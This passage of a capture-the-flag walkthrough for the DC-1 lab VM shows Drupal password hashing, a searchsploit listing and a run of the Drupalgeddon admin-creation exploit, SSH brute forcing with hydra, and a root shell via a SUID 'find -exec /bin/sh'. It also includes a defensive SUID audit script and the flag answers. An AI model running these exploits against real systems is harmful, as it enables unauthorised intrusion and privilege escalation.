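        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def password_crypt(password: str, setting: str):
    """Port of _password_crypt('sha512', ...): 55-char hash, or None if malformed."""
    setting = setting[:12]                 # '$S$' + count char + 8-char salt
    if len(setting) < 12 or setting[0] != "$" or setting[2] != "$":
        return None
    count_log2 = ITOA64.find(setting[3])   # 4th char encodes log2(rounds)
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        return None
    salt, pw = setting[4:12].encode(), password.encode("utf-8")
    h = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):       # key stretching: 2**count_log2 rounds
        h = hashlib.sha512(h + pw).digest()
    output = setting + b64_encode(h)
    if len(output) != 12 + math.ceil(8 * len(h) / 6):
        return None
    return output[:HASH_LENGTH]

def check_password(password: str, stored: str) -> bool:
    """Port of user_check_password() for '$S$' hashes."""
    return stored.startswith("$S$") and password_crypt(password, stored) == stored

def hash_password(password: str, count_log2: int = 15) -> str:
    """Port of user_hash_password(): fresh 6-byte salt; 'D' = count_log2 15 as on the page."""
    return password_crypt(password, "$S$" + ITOA64[count_log2] + b64_encode(os.urandom(6)))
```

The fourth character of every hash on the page is `D`, i.e. 2**15 rounds of SHA-512, which is why brute-forcing these offline is slow compared with an unsalted digest.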

I used a ready-made exploit script.

searchsploit Drupal
---------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                        |  Path
---------------------------------------------------------------------- ---------------------------------
Drupal 4.0 - News Message HTML Injection                              | php/webapps/21863.txt
Drupal 4.1/4.2 - Cross-Site Scripting                                 | php/webapps/22940.txt
Drupal 4.5.3 < 4.6.1 - Comments PHP Injection                         | php/webapps/1088.pl
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution           | php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection                         | php/webapps/27020.txt
Drupal 5.2 - PHP Zend Hash ation Vector                               | php/webapps/4510.txt
Drupal 5.21/6.16 - Denial of Service                                  | php/dos/10826.sh
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilitie | php/webapps/11060.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)     | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)      | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Passwor | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Passwor | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Executi | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities                                | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution                    | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution               | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution                 | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities                         | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service                                     | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasplo | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote  | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Exec | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Exec | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remot | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution        | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                    | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure     | php/webapps/44501.txt
Drupal Module Ajax Checklist 5.x-1.0 - Multiple SQL Injections        | php/webapps/32415.txt
Drupal Module CAPTCHA - Security Bypass                               | php/webapps/35335.html
Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Si | php/webapps/18389.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cro | php/webapps/25493.txt
Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)       | php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution         | php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripti | php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary Fi | php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: A | php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)     | php/remote/40130.rb
Drupal Module Sections - Cross-Site Scripting                         | php/webapps/10485.txt
Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection               | php/webapps/33410.txt
---------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
---------------------------------------------------------------------- ---------------------------------
 Paper Title                                                          |  Path
---------------------------------------------------------------------- ---------------------------------
[Turkish] Drupal Coder Vulnerability Analysis & MSF Module Dev        | docs/turkish/40244-[turkish]-dru
---------------------------------------------------------------------- ---------------------------------

As you can see, the 13th line is a script that adds a user directly.

python2 /opt/exploitdb/exploits/php/webapps/34992.py -t http://192.168.1.9/ -u user -p pwd

[ASCII-art banner omitted]
Drup4l => 7.0 <= 7.31 Sql-1nj3ct10n
Admin 4cc0unt cr3at0r
Discovered by: Stefan Horst (CVE-2014-3704)
Written by: Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

[!] VULNERABLE!
[!] Administrator user created!
[*] Login: user
[*] Pass: pwd
[*] Url: http://192.168.1.9//?q=node&destination=node

So after logging in to the site, flag3 is visible.

Searching around shows that the flag sits in a directory under /etc; the question is how to go looking for it in order to escalate privileges.

Brute-forcing SSH

Using hydra

The password turns out to be orange.

After logging in over SSH, a couple of commands reveal flag4.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
flag4@DC-1:~$ ls
flag4.txt
flag4@DC-1:~$ cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy.  Or maybe it is?

Privilege escalation

  • Check whether any files carry the SUID bit

Search for commands with SUID set

flag4@DC-1:~$ find / -perm -4000 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

Escalating privileges and finding the last flag

flag4@DC-1:~$ find flag4.txt -exec "/bin/sh" \;
# pwd
/home/flag4
# whoami
root
# cd /root
# ls
thefinalflag.txt
# cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
#
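A defender's counterpart to the SUID hunt above, added here as an example that is not part of the write-up: a Python audit that compares a `find / -perm -4000` listing (the DC-1 output above, embedded as a constructed sample) against an assumed baseline of the SUID-root files a stock Debian install carries, so an out-of-place SUID `find` stands out; `scan_suid()` does the same against the live filesystem.

```python
# Added example, not from the write-up: audit a SUID listing against a baseline.
# EXPECTED_SUID is an assumed allowlist of the SUID-root files a stock Debian 7
# box is expected to carry; anything outside it deserves a look.
import os
import stat

EXPECTED_SUID = {
    "/bin/mount", "/bin/umount", "/bin/su", "/bin/ping", "/bin/ping6",
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/at", "/usr/bin/procmail", "/usr/sbin/exim4",
    "/usr/lib/pt_chown", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/sbin/mount.nfs",
}

# Constructed sample: the `find / -perm -4000` output captured on DC-1 above.
SAMPLE_LISTING = """
/bin/mount /bin/ping /bin/su /bin/ping6 /bin/umount /usr/bin/at /usr/bin/chsh
/usr/bin/passwd /usr/bin/newgrp /usr/bin/chfn /usr/bin/gpasswd /usr/bin/procmail
/usr/bin/find /usr/sbin/exim4 /usr/lib/pt_chown /usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
"""

def parse_find_output(text: str) -> set:
    """Paths from `find / -perm -4000` output (whitespace-separated; paths
    containing spaces would need -print0 handling, which this sample does not)."""
    return {tok for tok in text.split() if tok.startswith("/")}

def unexpected_suid(paths, baseline=EXPECTED_SUID) -> list:
    """SUID files not in the baseline, i.e. the ones to investigate first."""
    return sorted(set(paths) - set(baseline))

def scan_suid(root: str = "/") -> set:
    """Live equivalent of `find / -perm -4000 -type f`, using os.lstat."""
    found = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue            # unreadable entry: skip, do not abort the audit
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found

if __name__ == "__main__":
    for path in unexpected_suid(parse_find_output(SAMPLE_LISTING)):
        print("unexpected SUID root binary:", path)
```

Run against the sample it reports only /usr/bin/find, which is exactly the binary the write-up turns into a root shell; on a real host, feed `scan_suid()` into `unexpected_suid()` and review anything it returns.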

Flag summary

flag1

Every good CMS needs a config file - and so do you.

flag2

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

flag3

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

flag4

Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy.  Or maybe it is?

flag5

Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
